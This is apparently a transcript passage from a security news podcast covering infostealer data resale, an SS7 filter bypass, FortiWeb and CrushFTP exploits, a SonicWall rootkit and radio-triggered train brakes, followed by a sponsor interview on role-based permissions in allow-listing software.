people listening to this see, so is thinking, God, what sort of controls do we have on our browser extensions?
Yeah, you need to be, you need to be looking at this.
And I think we're still early in terms of like understanding what the potential for
badness is with these extensions.
And I think the crooks are actually lagging on this and they're going to catch up and
we're going to start seeing all sorts of fun stuff happening in extension land.
All right, we've got to pick up the pace here because we've got a long run sheet this week.
We've got to get through it.
But let's look at this one from Joe Cox over at 404 Media.
There's this company called Farnsworth Intelligence, which its business model
appears to be selling InfoStealer logs to like law firms, debt collectors, and all sorts of companies,
which just seems like, you know, there's no allegation that they're operating these InfoStealers,
but they're gaining access to InfoStealer logs and then selling that data, which seems like, you know, there's no allegation that they're operating these InfoStealers, but they're gaining access to InfoStealer logs and then selling that data, which seems like,
I mean, okay, is it illegal to sell a username and password of someone's account that was
obtained from an InfoStealer?
I mean, I don't know.
Maybe.
Probably.
Maybe not.
But using that password is definitely illegal.
So I, you know, like, I wouldn't, I'm not a judge,
I'm not a lawyer, but I'm just saying,
I wouldn't operate a business like this
because I would think in addition to it being unethical,
I would expect there are some legal issues here as well.
Yeah, this seems pretty sketchy.
Like the guy behind this,
I don't know that he necessarily thought this
particularly well through, but yeah,
taking data that's on the dark web or wherever else you can get it, and then packaging up and
reselling it.
Now, there is something to be said for buying access to this data in a professional context.
I know back in Somalia, we would pay subscriptions for some services that provided us with data
breaches and data dumps and stuff in the style
of have I been pwned, but in a way that would give us credentials, right? So it would give you
unfiltered access to some of this data. And they took care, like the service we were buying was
them taking care of collecting, indexing, sorting, dedoping, et cetera, providing a stable API,
so that we didn't have to spend a day searching shady, dark websites trying to find our targets,
passwords and things.
So it was useful in that sense, but it was always a little bit kind of like, how do we,
in those cases, we were buying that service from people we knew and trusted.
So there was a personal relationship that kind of established some of the bona fide,
so we weren't just supporting randoms doing it, but it is a shady business.
And I wouldn't.
These guys aren't selling it for like info sec purposes or like so you can notify the
person that their accounts been breached.
They're giving people passwords so they can use the passwords you would think.
Yes, exactly. Which is not great.
Yeah. But I mean, you know, you can imagine like a bunch of the people that they're
selling to like skip traces, right, who are trying to find people who've skipped out on bail.
Like, Oh man, getting, getting their email account, like, man, that's just making it
easy. Right? So of course they're going to, they're going to use it.
If I'm a skip tracer and I've got an opportunity to log into my target's email
address, you know, I'm going to do that.
So I know where they are.
We've also got this one from Zach Whitaker over a tech crunch, which is I
initially thought, eh eh because it's about
You know people using SS7 to track people's phone locations
Although what makes this interesting is it's kind of exploiting I guess weaknesses in SS7 to do this, right?
Yeah, so this is the this is interesting as normally as you said, this is just by design
the issue here is that most telcos have dealt with this kind of tracing by putting filters,
you know, essentially, SS7 firewalls on the edge of their SS7 network that would say,
when I see an incoming request for a mobile device location,
check to see if the device we're asking about is one of ours.
So check the IMSE, you know, device identifier, and if it's one of ours, don't answer that,
drop the request so they can filter them
for stuff that is on network.
The people who were doing, who were abusing a bug here were,
I guess you'd call it a canonicalization flaw,
where there are ways to, multiple ways to encode
these messages, such that a naive filter which doesn't understand
all of the ways of encoding it can be bypassed.
And they use it like ASN1-BUR encoding,
which is like super complex for no good reason.
So yeah, the attackers were kind of malforming the IMZ
that they were asking about in such a way
that it was still valid when decoded at the end,
but not valid when decoded
by the SS7 firewall in the middle.
So pretty sweet, you know, kind of technical exploit being used to do surveillance like
this.
Yeah, yeah.
We've got some news out of Ukraine.
The Ukrainians are claiming to have wiped a bunch of databases at Gazprom, which is obviously
a company that's very important to Russia.
It's their gas company.
So we've linked
through to that one. I mean how much damage has been done? Hard to know. You're
not really gonna get some great visibility there. Oh time to talk about
bugs and bugs and stuff. John Griggs written this one up for the record but
there is a zero-day exploit for crush FTP in the wild. I feel like I'm having
deja vu. Didn't we have another one of these a few weeks ago I think maybe this is a variant from
a bug like I think someone reversed a patch and then figured something out so
this I don't know the specifics of this one. They reversed the patch and found a
different Ode. Yeah I think it's like a probably like a bypass in whatever
protection so this was a bug in the web management interface I think so I don't
know the specifics we haven't seen a PO for it, but yeah, it's being exploited in the wild.
And if you happen to run a, you know, any sort of FTP server on the internet,
you're probably already having a bad time.
So get to catching.
We've got an interesting one here because I'm expecting a lawsuit because I think
Cisco is about to sue Hewlett Packard enterprise HPE, because they've started
including hard-coded credentials in their, in their devices as well.
And we know that that's something that Cisco loves to do. They might have some, some patents around that. because they've started including hard-coded credentials in their devices as well.
And we know that that's something that Cisco loves to do.
They might have some patents around that.
Not entirely sure. We'll have to see what happens.
But yeah, there's some hard-coded credentials in the HPE Aruba Instant On access points.
So like, what are these, Wi-Fi access points?
Yeah, there's a Wi-Fi access points, like small, medium enterprise kind of Wi-Fi access points.
I don't know what the credential is
I'm assuming that it's gonna be like a real sick burn and it's actually like Cisco
username Cisco password Cisco because that would be hilarious by HP, but I suspect it's probably not no, that's uh, that's right
And what do we got here? We got a pre-auth. Oh man more from watchtower
We need to look we need to send them a case of beer or something.
Watchtower just keep providing the goods. So we got a pre-auth
SQL injection to RCE in Fortinet FortiWeb. Again get a proxy, get a reverse proxy
in front of that thing is my opinion. But yeah walk us through this one Adam
because you told me this one is proper comedy.
It is proper comedy. So this is a SQL injection in the auth header of this Fortinet FortiWeb
product. So that's bad enough, right? Like literally it's the authorization header and
you stick SQL injection into it and it runs queries in the database. So that's bad. What's even worse is that then MySQL,
the underlying database is running as root
and Watchtower Labs have written up
how to turn that onwards into CodeExec
using the classic select into outfile SQL injection
where you can have a query write its response
onto the local file system and they leverage that
with some Python
trickery to turn it into pre-auth remote root code exec in your Fortinet security appliance.
So, good job Fortinet, good job. Well done guys. And we've also got, and anyone could have seen,
blind Freddy could have seen this one coming as they say, but there was the Citrix Netscaler flaw we spoke about a few weeks ago and I think my comment at the time was,
yeah that one's gonna get a run. And apparently it is getting a run according to CISA. So this
story here is from David Jones at Cybersecurity Dive and was published on July 11. I'm not seeing
the news document that we work from filling up with links to stories about like this
Nat Scaler bug turning into a cyberpocalypse, but I don't know, there's still time.
Yeah, and there's plenty of people out there who are getting owned, and I have seen, you know,
some of the social media has been, you know, keeping an eye on all the sort of people who
are getting shelled. But this bug in particular, and the Citrix bleed bug that came before it,
the real value in these is that they are also 2FA by bus, because you're stealing session tokens for
live sessions post-off.
So all the 2FA in the world ain't going to help you, and that's worth something.
Yeah, yeah, it sure is.
And we've got a, someone's written a backdoor for SonicWall devices, which of course, you
know, everybody needs a backdoor for one wall devices, which of course, you know
Everybody needs a backdoor for one of those for when you pop them through some really dumb bug in them
And Google how Google's Threat Intelligence group has published some stuff on that
Yeah
They did a write-up of it and this one really warmed my heart because whoever wrote this particular backdoor
Kind of did it in a very classic trad Unix way. It's like a user mode
user mode rootkit, which they trigger from inside the init ID,
which is the RAM disk that it uses during boot up.
So they backdoor a shared library in the init RAM disk.
And then the way that you trigger this backdoor is
the user mode rootkit hooks all of
the network read and write functions,
and looks for magic strings being sent across the network.
So then you literally show up talking to the web interface on a Sonic wall and
you can just send it commands like anywhere in the network message and it
will get sniffed off the wire essentially by this rootkit and then used to trigger
the trigger the the backdoor function, which is, you know, it's not novel, but it's just,
it warmed my heart that kids still pick it up at school.
It's nice to see it in the real world instead of someone just theorizing about
it in a con talk, you know, it's nice to see people actually out there doing the
thing.
Exactly, exactly.
So I don't know which, you know, which Chinese, you know, private sector
contractor wrote this, but I appreciate you.
I appreciate your work. So I wonder if one day it's going to be like after the Vietnam War, you know, private sector contractor wrote this, but I appreciate you. I appreciate your work, sir.
I wonder if one day it's going to be like after the Vietnam War, you know,
how Americans went back to Vietnam to see the tunnels and to have a beer with the VC.
I wonder if that's going to be us one day.
We'll be over in Beijing, sitting down, having a beer with the MSS,
talking about their adventures in Sonic Walls.
This actually reminded me too about a talk you did years ago
about writing user mode rootkits for Unix systems
where yeah, the whole purpose of your talk was like,
they won't let you do root.
So you have to do everything in user space,
like here's how I do it.
And it was a very funny talk
and you had a grab bag of party tricks that you showed.
Yeah, that was my non root rootkits talk.
And yeah, that was good fun.
This is why I appreciate this kind of like Unix Tomfoolery.
No, I get it. And I can tell that you're like, ah, I should have thought of that one.
I mean, hey, we did this. We were doing this a long time ago in the Unix. Well,
it's just really nice that kids still do it. That's what I value.
Okay, good, good, good.
Somewhere in Hainan Island, somebody is doing the same thing. And I was, yeah, I'm with you, brother.
I'm with you.
Yeah, yeah.
Let's see.
Let's see, though.
I reckon one day, the cyber tours,
where you get to as an older gentleman or an older lady,
get to tour through the cyber complex in China
and meet with those people and talk about how they got you.
Now, the last thing we're going to talk about today,
it's a story, another one from 404 Media by Matthew Gault,
which is talking about how hackers can remotely trigger the brakes on American trains,
and the problem has been ignored for years. Let me guess, this is something that's going to involve,
if you have the software to find radio, you can send the magic packet that makes it do the thing, right?
That is exactly what the story is. It turns out, yes, there are these things they put on the back of trains
that monitor it and can also remotely activate the brakes. A train is arbitrarily
long as you add more, you know, carriages and things, and more carts, trucks, what are
they called? What's the cars? Cars, more cars to the train. So, you know, they don't
necessarily want to have to string wires along so they have radios. Yay. And of course, these
systems were all designed when the idea that the general public
would have access to flexible radios
was not a threat model, was not a thing anyone cared about.
So yeah, much like so much of our industrialized world
that relies on like 1970s, 1980s radio tech,
if you've got a radio, you win a great many prizes.
And the American regulator or whatever for the railway
industry has said that they're going to fix this at some point, but it's like billions
of dollars worth of gear that needs to be replaced. And it's hard not to read a story
like this and go, you know, the fact that no one has been activating the brakes on these
things meant that the cost of fixing this and doing it right in the 80s with, you know,
processes that can't do crypto or whatever other mechanisms, you know, whatever controls
you would have put in place versus the risks, just not addressing this was probably actually
the right choice from a risk management point of view.
So yeah.
Well, and I think make train stop bad, make train go worse.
Like if this was a make train go with packet, that's really bad. Make train stop, okay, inconvenient.
Make train go, kaboom.
I think that's the thing.
Yeah, that's it.
Yeah, it's always fun reading these kinds of stories, you know, because they are,
you know, you're
torn between is it junk hacking?
Is it real?
Is it risk management?
Is it business?
And the answer is, hey, it's a little bit of all of them.
Look, if you remember seeing a talk from Balent Seber years ago on SDR stuff in Canberra,
and it is pretty terrifying once you realize like the breadth of this problem, like it
ain't just trains.
Like there is so much stuff you can mess with
With SDR and it's kind of surprising that we haven't seen
Drama with it so far, but I mean I guess the you know flipper like a lot of flipper zero stuff would be that's where
You see the mischief but not people who are actually battery charged flap on Tesla's with the flipper. Yeah. Yeah exactly, right?
But you're not seeing you're not seeing really really serious stuff. Anyway, we got to wrap it up there because we're over time. No
surprises there because it's our first show in three weeks. But Adam Boileau, great to be back
on deck. Great to chat to you, man. We're going to do it all again next week. Cheers.
We certainly will, Pat. I will see you then.
That was Adam Boyle with the check of the week's security news. It is time for this week's sponsor interview now and we're chatting with David Cottingham
who is a co-founder and the chief executive of Airlock Digital.
Airlock makes allow listing software that you can actually use at scale.
They have customers with like 100,000 endpoints plus
and it works. It actually works and it's manageable and it's completely unlike trying to do it with the other tools that they are rapidly replacing in enterprise environments. So yeah, I guess
Airlock is a relatively new company. I mean, it's under 10 years old and as part of like becoming a serious business enterprise company, they had to actually work on creating a multi-user, multi-role console for allow listing.
Which makes sense because you've got some, you've got different groups who need to do different things with allow listing.
Like as you'll hear, like it's the support people who might give someone an exception to run something one time that they nearly really need to run.
And it's the application people who might need to adjust the allow list because they're
rolling out a new application and whatnot.
So you know, where they started was just to have the one big console and everyone can
log into it.
But then as you start getting those really big customers, you have to start thinking
more and more about like, well, how does this product have to work, right? For different people in an organization.
Now this sounds like it might actually be a dull conversation, but it's really not.
It's an interesting one.
I'm talking to Dave about, you know, bringing Airlock up, growing it up into a proper
enterprise product with like a multi-role console.
So here is Dave Cottingham talking all about that.
Enjoy.
So we actually recommend that you have the security people
looking at the security data, the people that
are deploying applications looking at the app data.
And even though some people might laugh at it a little bit,
the support team issuing exceptions,
because that creates the most logical sort of business
engagement approach to getting apps deployed,
getting exceptions out there, and ensuring business continuity effectively. So what we have to do inside
of the console is essentially for all of those sort of major, I guess, persona
roles, attach, you know, different privileges so you can access or invoke
different parts of the product depending on whatever your role set is. And also
then thinking about how different actions can be dangerous.
We spend a lot of time thinking about how we prevent against someone unintentionally or
intentionally configuring something in a bad way that, you know, depending on their access.
Yeah. So that's a whole other part of this conversation. We'll get to that bit a little
bit later on, which is, well, we're seeing now like,
you know, these com kids, the advanced persistent teenagers, they're going and
state actors as well, they'll go after things like EDR consoles, compromise and
identity, switch off EDR or like make it blind or something.
And then onwards from there out to the end point.
So I'm guessing you've had to put a bit of thought there.
Um, but like, what was that transition like?
I imagine for you, it was like, yes,
single console, single administrator.
And then like, how do you begin to transition from that
into these multiple roles and permissions?
Because that's like, even if you wanna add one different role,
it's almost like a product rewrite of that part
of the product to begin with, right?
Completely.
And also, you know, the way our product worked a while ago was you sort of had
this one object to many relationship that, for example, you could have a list
of applications that you've trusted.
And it might be in multiple, you know, Windows servers and Windows work
stations, for example, and customers might want two
different teams to administer both of it. However, you have like one application list
that links to both. And so decoupling all of that was a huge amount of work in the product.
So the first thing that a lot of vendors will do is they will just prevent you viewing those types of objects, right? So they
will say, okay, well, this page won't render unless you actually pass this permissions check.
But obviously that's quite weak, right? So you sort of start from that visual part so people can't see
it. And then you work backwards to, you know, what we call the application controllers underneath those pages, which is, okay, the controller
needs to authorize the user and what actions it's requesting based on what permissions
it has. And then down below that, then there is the back end, which is about what information
am I actually processing and generating? And that needs to be user aware. So the first
thing was actually making sure that each component has visibility
of what user has taken a particular action
and actually flowing that all through
because when we designed it in the first place,
it was sort of like, oh, the system did this
because you'd build like a binary
and it would just get parameters to do work,
but it wouldn't be aware of like,
who's actually asking it to do said work.
So, it was a full approach of front end middleware controllers and backend, making it user aware
and then making it permissions aware on top of that.
And then unpicking all the implications about, well, hang on, this part is actually related
to this part if you want to, let's say, approve an application
and making sure that you can do enough, but not sort of too much to influence things that
you don't have access to.
Yeah.
So I imagine like the early stage of this, when you start moving to like more of a multi-user
multi-role platform is like you fire up version one, you're like, great, everything's broken.
Pretty much.
Completely.
Yeah.
Or I log in and nothing renders.
And it's because there's one call which is down here, which is shared, and then you have
to work to split that out.
I mean, even like we're going through a UI, you know, rebuilding in the next release of
the product, we're in next release of the product.
We're in QA at the moment.
And yeah, really, it is every call,
rechecking all of those things meticulously
in every single combination of user permission
to just make sure that we're really blocking and tackling.
And having, for lack of a better term, sort of an
implicit deny approach to authorization in everything you do in the product.
Yeah, so it's interesting what you said, right?
Because earlier you were talking about how users have sort of coalesced around these
sort of pretty clearly defined roles, right?
Like there's the applications person, there's the support person.
When you were talking about exceptions, too, for those who didn't follow, it's like if someone tries to execute something,
they can't, the product blocks it,
they can go to support and ask for like a one-time code
to be able to run it and whatever.
And that's what a lot of customers want.
So you talk about these predefined roles,
but then you're talking about, well,
all of these combinations and permutations of permissions.
So I imagine that would have been a decision for you,
which is like, do we have several pre-canned roles
with permission sets, or do we let the users go in there
and really mess with stuff?
And it sounds like you went that route,
but surely there's dragons there, right?
In terms of unexpected combinations of permissions,
unlocking potential for stuff to go wrong.
Like how do you even begin testing
all of those combinations and
permutations to make sure that they work? It's really leaning heavily on automation as much as
you cannot possibly throw people power at this. Like we've got an automation rig that runs for
about 48 hours, builds up a product, runs through all of those different permutations and then
it will be
not only sort of like a test harness, but it's functional testing that I think is the
most important. So it's actually going in there, having a system if you're automating
it, click something, and make sure that it can find the next thing that it actually needs
to click on to run through that process. And if you...
And then you want to see something actually pop out
onto an endpoint, right?
Essentially, yeah.
And then make sure that what you're doing in the console,
then you've got to tie automation in with the endpoint
as well in order to functionally test that.
We've really led a lot with functional testing,
preferencing it over unit tests,
even though both are important,
just because ultimately that sort of tests from the user perspective all the way down
to the backend, what's generated and then back up to what pops out in the other end.
It's sort of like a proven approach through the whole stack.
So there's a huge amount of complexity there. One classic one was we have view roles and edit roles, but you can't edit without viewing.
And it's kind of this silly thing where it's like, well, hang on, you need both of these if you want to edit.
And it's just lessons like that, but that you end up very easily unless you plan it out meticulously backing yourself into a bit of tech debt that you need to engineer out of.
Well, I mean, this is why it's an interesting conversation, right?
Is because, you know, I've been interviewing you since you were a little itty bitty babby startup and you were not anymore.
Right. And this is all part of that that growing up experience.
Yeah, one was the REST API.
So, you know, obviously we've, you know, we've got a whole REST API and we try and make the REST API. So obviously, we've got a whole REST API,
and we try and make the REST API match
the logged-in interactive functionality as much
as possible.
But you don't want REST API keys floating around there.
So we suddenly realized, well, hang on.
If I get an API key, we had a role
for grant a REST API key.
But then once you had an API key,
you could sort of do anything.
And then it's like, well, hang on.
We now need to put permissions on the rest API.
So how do we best do that?
Then the easiest thing we did was we broke it down to like calling endpoints.
So it's like, you need to say which endpoints this key has access to.
And then it will either allow it to deny access to an endpoint.
But then it's like, okay, well, if I, let's say,
have access to the policies endpoint,
but I only want this REST API key for this user to see these policies,
you know, it starts to come back into that functional scope as well,
where you need to flow it through not only REST API access,
but back up into the application.
And I think throughout the journey,
we've sort of learned that constraints are good,
and there are dragons when you try and satisfy
every single use case that every customer wants.
Well, that's kind of what I was asking about precanned versus
ultimate flexibility.
So you landed somewhere in between, have you?
Yeah, we have.
So we've got the REST API access, you know, based on endpoint and the user roles interactively.
And now we're adding in, you know, a bit of object access on the REST API side,
just so we can more granularly sort of segment based on who needs to manage what.
So it has happened that a customer said, oh, we would like to be able to do X, Y,
Z. And you're like, how about no.
Yes. I want, I want a REST API key just for this server, you know, and at the end
of the day, it comes down to, well, create a separate policy for that.
And then, you know, there's a level of, you need to structure it in a certain way.
If you want the level of granularity that you're looking for, cause you know,
yeah, learn the product, do it our way.
It's better.
There are infinite edge cases.
And if you try and satisfy them all, you'll end up with this unwieldy
monster that you need to manage.
Yeah.
Well, it's how vendors fall, right?
Like it is actually, they just get overly complex and then someone comes along with the next simple thing and you know, away you go.
And exactly. Starts again from a clean slate. Yeah.
And given like a big premise of your product, right?
So I spoke to Alex and Chris, or Alex and Steve actually over at Sentinel One about, you know, what various threat actors would do when they tried to access Sentinel One consoles.
You know, and you can't just turn off EDR, right? Like if you've got access to that console, because that will raise alarms,
that will cause some, you know,
bells to go off and whatnot.
So there are some natural sort of defences there
that you can build in,
but I'm curious how you tackled it
as an allow listing company.
Like what is it that you do to prevent a disaster
when a threat actor turns up with valid
credentials into your admin console? So the first thing and you touched on it with EDR is visibility
for the customer. So the customer needs to be able to really easily see what configuration changes
have been made at any given time so that they can see, hang on, this thing was added at
this time and you're showing them whenever a change is made.
The interesting thing about our product is all the changes are driven by the users.
So you go in, you want to allow something, it's you that needs to choose that.
It's not supplied by us as a vendor.
It's like you define that trust. So really bringing
forward what's being changed when and hopefully why if the administrator wants to fill in that
detail, it will tip them off to, hey, these policies have actually changed. So, you know,
letting them know is critical. The second one is understanding, especially in a deny by default scenario, about what
dangerous sort of policy looks like.
So when you're talking about implicitly not trusting
anything, it's a dangerous tool, potentially,
because what you can do is you could say,
oh, I want to block these system files for example
so what we spend a lot of time on is
Doing things like let's boot a system
let's understand what the critical items are in actually to get this system up to a shell get network access so it can get policies and
putting detections in place so that if
a policy is detected that the endpoint gets that doesn't have, you know, this sort of
minimum required trust to allow a system to functionally operate, then what it will do
is it will continue operating on the same policy that it had previously and then it
will report safe mode.
I'm guessing this is your, your post crowd strike disaster, uh,
initiative.
Oh, I look, I think, um, it,
it's been in there for a few years,
but we've definitely iterated on what that looks like.
Definitely tighten that one up a little bit after that. Yeah.
It was quite simple. And then, and then we sort of like, well, hang on
What happens if this?
Particular situation occurs and it's sort of like you need to build in the smarts on
the agent that you're influencing to either
You can't have it blindly trust everything the server tells it to even though the server is the authoritative
Yeah kind of do what I say please, you need to
also make sure that the agent itself has a level of veto in place to say, no, I'm not
doing that because that's bad.
And what about a malicious allow?
So you've talked about someone accessing a console and doing a malicious denial of like
a critical system DLL or something, right?
What about the opposite case where someone wants to get some malware or like some rat
onto an allow list? Like is there something you can build into the product that makes that
more difficult for a rogue admin to do? Because I'd imagine that would be very, very hard.
Yes, and I guess it's sort of like it's easy when there's known
malware that's out there because like we will, we've got a great partnership with the virus total.
And we will basically flag like, hey, this malicious thing's been either added to your allow list or it's been detected as part of your trust set.
Like you've seen something that's bad that's alert you to that.
But when it's stuff that you haven't seen before, I think again, it's back to the best offence is visibility, seeing when an actual change has been made to add something and
giving people visibility of that.
Going forward, one thing that we're building is also segmented approvals of policy.
So what you'll have is two different users where one person sets up the policy changes
and another person has to go in and actually click accept on that.
Yeah. So I've always wondered about like, yeah, dual key, like in the submarine movies,
you know what I mean?
The guy takes the key around from around his neck and the other one does and they have
to turn them at the same time kind of thing.
Yeah, that makes a lot of sense.
Do many people actually bother with that though?
A lot of people want it in the enterprise because, and it's interesting because they will say, okay, I will trust this team to allow things
if I have oversight of it.
So they'll want the security team to have oversight, but the application team to actually
make the decisions.
So they're just sitting there going, look, look, look, approve.
You know, that's definitely needed.
Last question is, you know, you keep talking about this visibility.
How are people choosing to consume those changes?
Is that like pumped out to a SIEM?
Is it like a Slack alert?
Like how do people usually choose to get that information?
Because it is quite low volume, right?
It is, yeah, especially when you're talking about the change.
So, you know, either a push notification to Slack is a big one.
The other one is SIEM alerts, as you said.
And then third is definitely actually being in the console.
I'm seeing a preference towards people actually wanting to sort of manage the product outside
of the product, but that normally happens only for the large enterprise end of town
where they've really got a whole bunch of other systems that they're automating.
So I think it's just about making sure that you have the integrations in the ecosystem
for the tools that the customers have so you can push those notifications and changes out.
Man, awesome chat. I love talking to you about how Airlock's all grown up.
It's really cool. Great to see you Dave and I'll catch you again soon.
Thanks so much Patrick. Cheers.
That was Dave Cottingham there from Airlock Digital, a fine company that makes fine software. I
do absolutely 100% recommend and endorse Airlock Digital. I am not an advisor to
them, I just think they're really cool. And that is it for this week's show. I do
hope you enjoyed it. I'll be back next week with more security news and
analysis, but until then I've been Patrick Gray. Thanks for listening. Music